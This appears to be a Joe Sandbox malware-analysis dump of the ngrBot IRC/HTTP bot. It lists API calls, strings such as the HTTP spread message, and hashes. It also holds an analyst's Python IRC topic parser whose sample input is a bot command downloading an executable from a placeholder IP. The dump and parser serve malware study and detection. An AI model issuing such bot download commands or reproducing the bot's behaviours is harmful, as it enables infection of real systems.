                                                                  • atoi.MSVCRT(00000000), ref: 003DC9AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: atoilstrcatlstrlen$lstrcmp
                                                                  • String ID: [HTTP]: Updated HTTP spread message to "%s"$http$msg
                                                                  • API String ID: 3861295430-3390247340
                                                                  • Opcode ID: b7cd8053e5152b442a70fed171692eb84d917e28c14c215736d3d590cab9e541
                                                                  • Instruction ID: 47e5ce13cc79fc499c87766042594b9f7a029b9f5f264c853ff8d4aa523b7b3b
                                                                  • Opcode Fuzzy Hash: b7cd8053e5152b442a70fed171692eb84d917e28c14c215736d3d590cab9e541
                                                                  • Instruction Fuzzy Hash: 8801C47691025D9EDB22DB60DC81EDBB37CAF44300F11058AE44997182DB70FA86CF61
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
                                                                  • ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
                                                                  • GetLastError.KERNEL32 ref: 003D3EE3
                                                                  • GetLastError.KERNEL32 ref: 003D3EEA
                                                                  • GetLastError.KERNEL32 ref: 003D3EF3
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF), ref: 003D3F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: 7dbdf45d5aaf146afbb0b1167dbfff8a1835e50c413952c15d5aca8ac7e10598
                                                                  • Instruction ID: 1fa9a656c4461f8fecb4723fdf920a5bf4a1d913cf5498310075ea994c1d480e
                                                                  • Opcode Fuzzy Hash: 7dbdf45d5aaf146afbb0b1167dbfff8a1835e50c413952c15d5aca8ac7e10598
                                                                  • Instruction Fuzzy Hash: E5418DB6604219EFD711CF68E8C4FAA77A8FF49304F408658E5469B385C731EE51CBA2
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,-003E7960,00000800,00000000,?,?,?,00000000,000000FF), ref: 003D3DFF
                                                                  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 003D3E3E
                                                                  • ReadFile.KERNEL32(?,003E7960,00000800,00000000,?), ref: 003D3ED7
                                                                  • GetLastError.KERNEL32 ref: 003D3EE3
                                                                  • GetLastError.KERNEL32 ref: 003D3EEA
                                                                  • GetLastError.KERNEL32 ref: 003D3EF3
                                                                  • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 003D3F0D
                                                                  • GetLastError.KERNEL32(?,?,00000000,000000FF), ref: 003D3F1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$FileRead$MultipleObjectsOverlappedResultWait
                                                                  • String ID:
                                                                  • API String ID: 146293752-0
                                                                  • Opcode ID: f98f24b07ae05d0e29b8a5bd9e05061e2d64751cc6deab154d9319fb8d854e7a
                                                                  • Instruction ID: 4fe6dabab8b0a800b8b411b691b0cede5d2012e179bf3dcaafc7c74de2e0a282
                                                                  • Opcode Fuzzy Hash: f98f24b07ae05d0e29b8a5bd9e05061e2d64751cc6deab154d9319fb8d854e7a
                                                                  • Instruction Fuzzy Hash: D3419DB6604219AFD711CF68E8C4FAA77A8FF49304F408658E5069B381C731EE01CBA2
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 003D752B
                                                                  • _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
                                                                  • _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
                                                                  • lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
                                                                  • StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
                                                                  • lstrlenA.KERNEL32(?), ref: 003D75B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$_snprintf_vsnprintflstrcmp
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 3897371274-741241040
                                                                  • Opcode ID: 726638a4f028c6ba6f7936c4ead4811d6733c4fe72510fbdea1a5c505a67353c
                                                                  • Instruction ID: 811a997c4f99f12f1588b30ab6376034f2db93121b1abe16afbb04e2c56fb9c5
                                                                  • Opcode Fuzzy Hash: 726638a4f028c6ba6f7936c4ead4811d6733c4fe72510fbdea1a5c505a67353c
                                                                  • Instruction Fuzzy Hash: 8321F6736042256BDB229E69BCC9FEBB75CEB45750F04066AFD09D7281FA70DE0086E1
                                                                  APIs
                                                                  • LocalAlloc.KERNEL32(00000040,0000103C), ref: 003D8688
                                                                  • htons.WS2_32(?), ref: 003D86AE
                                                                  • inet_ntoa.WS2_32(?), ref: 003D86F7
                                                                  • htons.WS2_32(?), ref: 003D8704
                                                                  • GetTickCount.KERNEL32 ref: 003D8713
                                                                  • CreateThread.KERNEL32(00000000,00000000,003D8640,00000000,00000000,00000000), ref: 003D8734
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D873B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: htons$AllocCloseCountCreateHandleLocalThreadTickinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 30336511-0
                                                                  • Opcode ID: af12c214352e10b6538f221c1e0159bf503b42256e46f0ec42b0049817f4e98a
                                                                  • Instruction ID: 51ce0e87f36cb32933fdc6b0470ac3a89e3a90fa5e488efc42ef44af56d270e5
                                                                  • Opcode Fuzzy Hash: af12c214352e10b6538f221c1e0159bf503b42256e46f0ec42b0049817f4e98a
                                                                  • Instruction Fuzzy Hash: 3F212B7560174097D3225BB4FC4A7EA77A8AF04310F144A2AF59D8B3D0DBF0A5848B59
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D77AE
                                                                  • memset.MSVCRT(?,00000000,000001FF,?,00000000,00000103), ref: 003D77C8
                                                                  • lstrcpyA.KERNEL32(00000000,off), ref: 003D77F0
                                                                  • _snprintf.MSVCRT(00000000,000001FF,state_%s,?), ref: 003D780D
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7822
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D7858
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlenmemset$_snprintflstrcpy
                                                                  • String ID: off$state_%s
                                                                  • API String ID: 1009457118-628336787
                                                                  • Opcode ID: c58a2284145792037302e4825a14ceb9efdd0f4ac73b6e8fab3f2b352600a043
                                                                  • Instruction ID: 92e4799965af19d95a97f8d053ad596c3340455020d04244051422044a56e440
                                                                  • Opcode Fuzzy Hash: c58a2284145792037302e4825a14ceb9efdd0f4ac73b6e8fab3f2b352600a043
                                                                  • Instruction Fuzzy Hash: F91133B694136877D722E651DC46FEF337C8B84700F0002E9FB486A1C2E6F02B848AA1
                                                                  APIs
                                                                  • printf.MSVCRT(block_size: %d,?,00407A80,?), ref: 003D34A0
                                                                  • printf.MSVCRT(ngr->blocksize: %d,?,block_size: %d,?,00407A80,?), ref: 003D34AD
                                                                  • printf.MSVCRT(Done frst,?,?,?,?,00407A80,?), ref: 003D34CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: printf
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3524737521-1816125109
                                                                  • Opcode ID: 409b0083087d7c189a890ef92a4eb55af9b5fa2f7869c1f4943bc78cbec9bc57
                                                                  • Instruction ID: d8348b0a48bcf4153e2e422b9b27adce15ae64e4305fe7c675b2ff77673fc277
                                                                  • Opcode Fuzzy Hash: 409b0083087d7c189a890ef92a4eb55af9b5fa2f7869c1f4943bc78cbec9bc57
                                                                  • Instruction Fuzzy Hash: 8641E7B6A00204ABCB15DF69E845E9A77A9EF84314F14C65EF8098B381E731EF01CB91
                                                                  APIs
                                                                  • htons.WS2_32(?), ref: 003D2A44
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D2A8A
                                                                  • WSAGetLastError.WS2_32(00000002,00000001,00000006), ref: 003D2A96
                                                                  • GetLastError.KERNEL32(00000002,00000001,00000006), ref: 003D2A9B
                                                                    • Part of subcall function 003D24A0: GetProcessHeap.KERNEL32(00000000,?,003D2131,00000000), ref: 003D24B4
                                                                    • Part of subcall function 003D24A0: HeapFree.KERNEL32(?,00000000,1!=,00000000,?,003D2131,00000000), ref: 003D24C3
                                                                  • inet_ntoa.WS2_32(00000002), ref: 003D2AEE
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003D2AFC
                                                                  • Sleep.KERNEL32(000005DC,00000000,?,00000010,00000001,00000006), ref: 003D2B0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$ErrorLastProcess$AllocFreeSleepconnecthtonsinet_ntoasocket
                                                                  • String ID:
                                                                  • API String ID: 268164981-0
                                                                  • Opcode ID: 9bde5acb8af36243b5af01ecac1e01bb78957b5b1a7064ca6c6f413058b22165
                                                                  • Instruction ID: 9847c3193035cafeb3b631aa02bcd00f8281856ed319ef1cca363af67ee65841
                                                                  • Opcode Fuzzy Hash: 9bde5acb8af36243b5af01ecac1e01bb78957b5b1a7064ca6c6f413058b22165
                                                                  • Instruction Fuzzy Hash: CC411772E002149BCB22EFA9E881A6FB3B9FF54324F104667E959DF380D6719941CBC1
                                                                  APIs
                                                                  • select.WS2_32(00000000,00000000,?,00000000,?), ref: 003D7FD4
                                                                  • send.WS2_32(?,?,?,00000000), ref: 003D7FFB
                                                                  • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,00000000,?), ref: 003D8004
                                                                  • select.WS2_32(00000000,00000000,00000000,00000001,?), ref: 003D803D
                                                                  • select.WS2_32(00000000,?,00000000,00000000,?), ref: 003D8081
                                                                  • recv.WS2_32(?,?,00001000,00000000), ref: 003D809A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: select$FreeLocalrecvsend
                                                                  • String ID:
                                                                  • API String ID: 1822081929-0
                                                                  • Opcode ID: 346268592867af884d1ec6f78dc87a983da32c04590c78595c975192d30af863
                                                                  • Instruction ID: 5d52aa98b90b997aba3639d25935eea7cd0c69996008af9f1129a567a708c8c4
                                                                  • Opcode Fuzzy Hash: 346268592867af884d1ec6f78dc87a983da32c04590c78595c975192d30af863
                                                                  • Instruction Fuzzy Hash: F2418172500754ABD730DB69DC81BE6B3F8EB98710F00469EF5898B680D7F5B9C98B90
                                                                  APIs
                                                                    • Part of subcall function 003D2460: GetProcessHeap.KERNEL32(?,003D20DE,?), ref: 003D246C
                                                                    • Part of subcall function 003D2460: HeapAlloc.KERNEL32(?,00000008,003D20DE,?,003D20DE,?), ref: 003D247E
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 003DAFBD
                                                                    • Part of subcall function 003DAFA0: HeapAlloc.KERNEL32(?,00000008,-00000002), ref: 003DAFCB
                                                                    • Part of subcall function 003DAFA0: memset.MSVCRT(?,00000000,000003FF), ref: 003DAFE8
                                                                    • Part of subcall function 003DAFA0: memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF), ref: 003DB002
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(?), ref: 003DB013
                                                                    • Part of subcall function 003DAFA0: sscanf.MSVCRT(00000000,POST /%1023s,00000000,00000000,?,00000000), ref: 003DB02A
                                                                    • Part of subcall function 003DAFA0: strtok.MSVCRT(00000000,003E2B84), ref: 003DB041
                                                                    • Part of subcall function 003DAFA0: _memicmp.MSVCRT(00000000,Host: ,00000006), ref: 003DB05B
                                                                    • Part of subcall function 003DAFA0: strtok.MSVCRT(00000000,003E2B84), ref: 003DB06E
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB09B
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0AD
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0BB
                                                                    • Part of subcall function 003DAFA0: lstrlenA.KERNEL32(00000000), ref: 003DB0C6
                                                                    • Part of subcall function 003DAFA0: HeapAlloc.KERNEL32(?,00000000,?), ref: 003DB0D5
                                                                    • Part of subcall function 003DAFA0: _memicmp.MSVCRT(00000000,HTTP,00000004), ref: 003DB0EB
                                                                  • strstr.MSVCRT(00000000,003E19DC,?,?,?,?), ref: 003D6EBC
                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?), ref: 003D6EC9
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?), ref: 003D6EE7
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 003D6F1A
                                                                  • HeapFree.KERNEL32(?,00000000,?,?,?), ref: 003D6F2C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,?), ref: 003D6F3C
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(003D6E9C,00000000,00000000,00000000,?,?,003D6E9C), ref: 003DB178
                                                                    • Part of subcall function 003DB160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,003D6E9C), ref: 003DB186
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(003D6E9C,?,?,003D6E9C), ref: 003DB18F
                                                                    • Part of subcall function 003DB160: strstr.MSVCRT(00000000,,00000000,003D6E9C,00000000,?,?,003D6E9C), ref: 003DB19F
                                                                    • Part of subcall function 003DB160: strstr.MSVCRT(-00000004,003E19DC,?,?,?,003D6E9C), ref: 003DB1B6
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1C3
                                                                    • Part of subcall function 003DB160: HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,003D6E9C), ref: 003DB1D2
                                                                    • Part of subcall function 003DB160: lstrlenA.KERNEL32(-00000004,?,?,?,?,?,003D6E9C), ref: 003DB1DC
                                                                    • Part of subcall function 003DB160: lstrcpynA.KERNEL32(00000000,-00000004,00000001,?,?,?,?,?,003D6E9C), ref: 003DB1E5
                                                                    • Part of subcall function 003DB160: HeapFree.KERNEL32(?,00000000,00000000,?,?,?,003D6E9C), ref: 003DB1F8
                                                                    • Part of subcall function 003E01E0: memset.MSVCRT(?,00000000,000001FF,00000000,00000000,00000000), ref: 003E0202
                                                                    • Part of subcall function 003E01E0: GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0213
                                                                    • Part of subcall function 003E01E0: EnterCriticalSection.KERNEL32(0041B4E4), ref: 003E0223
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(00000000,003E19DC), ref: 003E0243
                                                                    • Part of subcall function 003E01E0: lstrlenA.KERNEL32(00000000), ref: 003E0254
                                                                    • Part of subcall function 003E01E0: HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E025F
                                                                    • Part of subcall function 003E01E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 003E0272
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(00000000,), ref: 003E0281
                                                                    • Part of subcall function 003E01E0: _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                    • Part of subcall function 003E01E0: strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                    • Part of subcall function 003E01E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlen$Allocstrstr$Free$memset$Process_memicmpstrtok$CriticalEnterSection_snprintflstrcpylstrcpynsscanf
                                                                  • String ID: POST
                                                                  • API String ID: 836748388-1814004025
                                                                  • Opcode ID: 6cffed90115b803e4864d878469acf2efbdf8d554fd39e4f5d92a4e99fb107d7
                                                                  • Instruction ID: 63f0ae21f64fb225f9e41665d6670f6d936ba1d1c2a59830f0aebc9861772fe6
                                                                  • Opcode Fuzzy Hash: 6cffed90115b803e4864d878469acf2efbdf8d554fd39e4f5d92a4e99fb107d7
                                                                  • Instruction Fuzzy Hash: AC31B576900204ABCB129FA5FC86EAF77BCEB84300F15417AF91897341DA75EE1487A2
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003DD131
                                                                  • lstrcmpA.KERNEL32(?,332), ref: 003DD145
                                                                  • strchr.MSVCRT(?,00000021), ref: 003DD162
                                                                  • lstrcpynA.KERNEL32(00000000,?,000001FF), ref: 003DD18C
                                                                  • lstrlenA.KERNEL32 ref: 003DD198
                                                                  • memmove.MSVCRT(?,?,00000000), ref: 003DD1A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmplstrcpynlstrlenmemmovememsetstrchr
                                                                  • String ID: 332
                                                                  • API String ID: 3300951897-3855660651
                                                                  • Opcode ID: cb318ee29ff4b70d50a5aa88a21328819fa69738829e59d43219a2b379f4f85a
                                                                  • Instruction ID: 0ac594734c089ca957fd53fd1aaf3adec000987230e20a77b367f42a0daac096
                                                                  • Opcode Fuzzy Hash: cb318ee29ff4b70d50a5aa88a21328819fa69738829e59d43219a2b379f4f85a
                                                                  • Instruction Fuzzy Hash: 7E310876900256BBEB219B68DCC9FA7776CEF44340F044269F9099B282E770ED15C7B0
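The lstrcmpA against "332" and the strchr for 0x21 ('!') in the function above are the shape of IRC protocol handling: 332 is the RPL_TOPIC numeric reply (":server 332 <nick> <channel> :<topic>") and '!' separates the nick from user@host in a message prefix, while the 0x1FF-byte buffers fit the 512-byte IRC line limit (RFC 2812, CRLF included). The parser below is an added example written for this report, not code from the sample or from Joe Sandbox; it shows what such a handler has to do to pull a channel topic out of a line, and its input lines are constructed for the example.

```python
"""Minimal IRC line parser (RFC 1459/2812 framing) for reconstructing what a
"332" handler sees.  Added example for this report; the inputs in the test are
constructed, not traffic captured from the sample."""
from dataclasses import dataclass, field
from typing import List, Optional

RPL_TOPIC = "332"      # numeric reply that carries a channel's topic
MAX_LINE = 512         # RFC 2812 maximum, CRLF included (0x1FF + terminator fits this)


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: List[str] = field(default_factory=list)

    def prefix_nick(self) -> Optional[str]:
        """':nick!user@host' -> 'nick'; a server prefix has no '!' and is returned whole."""
        if self.prefix is None:
            return None
        bang = self.prefix.find("!")        # the strchr(prefix, '!') step
        return self.prefix if bang < 0 else self.prefix[:bang]


def parse_irc_line(line: str) -> IrcMessage:
    """Split one raw line into prefix, command and parameters (trailing kept whole)."""
    line = line[:MAX_LINE].rstrip("\r\n")   # never trust the peer to respect the limit
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    # the trailing parameter begins at the first " :" and may itself contain spaces
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        raise ValueError("empty IRC command")
    command, params = parts[0], parts[1:]
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, command, params)


def extract_topic(line: str) -> Optional[dict]:
    """Return {'source', 'channel', 'topic'} for a RPL_TOPIC line, else None.

    RPL_TOPIC parameters are: <target nick> <channel> :<topic>."""
    msg = parse_irc_line(line)
    if msg.command != RPL_TOPIC or len(msg.params) < 3:
        return None
    return {"source": msg.prefix_nick(), "channel": msg.params[1], "topic": msg.params[2]}


if __name__ == "__main__":
    # constructed sample, TEST-NET-2 address
    print(extract_topic(":irc.example.net 332 bot #c :!dl http://198.51.100.7/a.exe"))
```

A detection engineer emulating the bot's C2 can feed captured IRC lines through `extract_topic` to see exactly which topic text reaches the command dispatcher; anything that is not a well-formed 332 with three parameters is dropped rather than guessed at.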
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,?), ref: 003D7640
                                                                  • _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D765C
                                                                  • _vsnprintf.MSVCRT(?,000001FF,00000000,003D1732,?), ref: 003D767E
                                                                  • lstrcmpA.KERNEL32(?,bdns,?,?), ref: 003D76A0
                                                                  • StrStrIA.SHLWAPI(?,00000000,?,?), ref: 003D76B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf_vsnprintflstrcmplstrlen
                                                                  • String ID: %s_$bdns
                                                                  • API String ID: 4220314296-741241040
                                                                  • Opcode ID: f403f46c3705a04ed65c703e21a46cff4629d911d7a149d87503122b124a3851
                                                                  • Instruction ID: 77670595b60e41066d344227f095d3daffdf373f939193edde8efd5469b55512
                                                                  • Opcode Fuzzy Hash: f403f46c3705a04ed65c703e21a46cff4629d911d7a149d87503122b124a3851
                                                                  • Instruction Fuzzy Hash: 9E21C477A006586BDB319E69FCC4FEB736CEB44714F04066AF918DB241F670D91086E0
                                                                  APIs
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 003D3BD8
                                                                  • CreateNamedPipeA.KERNEL32(?,40000001,00000000,000000FF,00010000,00010000,00000000,00000000), ref: 003D3C0F
                                                                  • ConnectNamedPipe.KERNEL32(00000000,?), ref: 003D3C25
                                                                  • GetLastError.KERNEL32 ref: 003D3C2F
                                                                  • GetLastError.KERNEL32 ref: 003D3C46
                                                                  • SetEvent.KERNEL32(00000000), ref: 003D3C56
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorEventLastNamedPipe$Connect
                                                                  • String ID:
                                                                  • API String ID: 3507186782-0
                                                                  • Opcode ID: 6508a918885a5a1c871ca5e0909e927984ca0dbaa22b324577ef92e9f5154cb0
                                                                  • Instruction ID: 6e18c24d0fd934b48f95fba5beefbd480f2d4ce9115c69f31724737efa034221
                                                                  • Opcode Fuzzy Hash: 6508a918885a5a1c871ca5e0909e927984ca0dbaa22b324577ef92e9f5154cb0
                                                                  • Instruction Fuzzy Hash: E321C576350206AFE7228F64ECC4B99BB68EF44751F204626FA59DB2C0D7B1ED808B50
                                                                  APIs
                                                                    • Part of subcall function 003D3810: GetProcessHeap.KERNEL32(00000000,00000000,?,003D4046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 003D3819
                                                                    • Part of subcall function 003D3810: HeapAlloc.KERNEL32(00000000,?,003D4046,?,00000000,00000000,00000000,00000000,?,?,?), ref: 003D3820
                                                                  • sprintf.MSVCRT(00000000,\\.\%c:), ref: 003DF2E9
                                                                  • CreateFileA.KERNEL32(00000000,00000000,00000003,00000000,00000003,00000000,00000000), ref: 003DF2FA
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DF323
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,003E09A7,0000000C,?,00000400,00000000,00000000), ref: 003DF352
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003DF35B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCloseControlCreateDeviceFileHandleProcessmemsetsprintf
                                                                  • String ID: \\.\%c:
                                                                  • API String ID: 2995886503-1260769427
                                                                  • Opcode ID: 45330dfae05660c70b44339eec312ffb87198c0e831c5ee0537d35dd81d0d19e
                                                                  • Instruction ID: 12bad932ad225f58d662ae242f4f849a7494a98e8943895a97e5f2289af1f0b0
                                                                  • Opcode Fuzzy Hash: 45330dfae05660c70b44339eec312ffb87198c0e831c5ee0537d35dd81d0d19e
                                                                  • Instruction Fuzzy Hash: 752195F29002587FEB11DF95ACC5EFEB77CEB45754F00457AF608A6281E6B00F8546A1
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,003DE750,00000000,00000000,00000000), ref: 003DA659
                                                                  • MessageBoxA.USER32(00000000,This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!,ngrBot Error,00000030), ref: 003DA66F
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003DA678
                                                                  • ExitProcess.KERNEL32 ref: 003DA680
                                                                  Strings
                                                                  • This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!, xrefs: 003DA666
                                                                  • ngrBot Error, xrefs: 003DA661
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CreateExitMessageObjectProcessSingleThreadWait
                                                                  • String ID: This binary is invalid.Main reasons:- you stupid cracker- you stupid cracker...- you stupid cracker?!$ngrBot Error
                                                                  • API String ID: 2697768853-1169653777
                                                                  • Opcode ID: a5cfc0bbb6f9ce1eaf14213e99751a1bb55a2b6bf98c8d6038dfa9f9c15b2d06
                                                                  • Instruction ID: 74839152eb196b6e4e4579e3b5b3df73638691be99580797c4b794a79f497b70
                                                                  • Opcode Fuzzy Hash: a5cfc0bbb6f9ce1eaf14213e99751a1bb55a2b6bf98c8d6038dfa9f9c15b2d06
                                                                  • Instruction Fuzzy Hash: 84E067357C43E1B6E67257A05D4BF8539185B04F12F250710F325BD1D08AF025804759
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                  • lstrlenA.KERNEL32(?), ref: 003D7369
                                                                  • _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                  • _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
